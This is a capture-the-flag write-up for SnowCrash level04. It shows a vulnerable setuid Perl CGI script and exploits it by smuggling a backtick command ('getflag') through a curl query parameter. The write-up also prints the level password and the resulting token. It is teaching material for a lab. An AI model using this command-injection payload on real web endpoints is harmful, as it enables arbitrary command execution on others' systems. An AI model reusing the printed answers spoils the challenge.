level03@SnowCrash:~$ PATH=/bin
level03@SnowCrash:~$ su level04
Password: qi0maab88jeaj46qoumi7maus

level04@SnowCrash:~$ ls -l
-rwsr-sr-x 1 flag04 level04 152 Mar  5  2016 level04.pl
Again the ’s’.

level04@SnowCrash:~$ cat level04.pl
#!/usr/bin/perl
# localhost:4747
use CGI qw{param};
print "Content-type: text/html\n\n";
sub x {
  $y = $_[0];
  print `echo $y 2>&1`;
}
x(param("x"));

We need to listen on the port 4747 with curl -I to include the http header.

level04@SnowCrash:~$ curl -i 192.168.0.22:4747
HTTP/1.1 200 OK
Date: Fri, 08 Oct 2021 00:02:27 GMT
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1
Content-Type: text/html

We pass a variable x to see the echo in action :

level04@SnowCrash:~$ curl 192.168.0.22:4747?x=toto
toto

So we will pass a command between `` to make echo execute it.

level04@SnowCrash:~$ curl 192.168.0.22:4747?x="\`getflag\`"
Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap
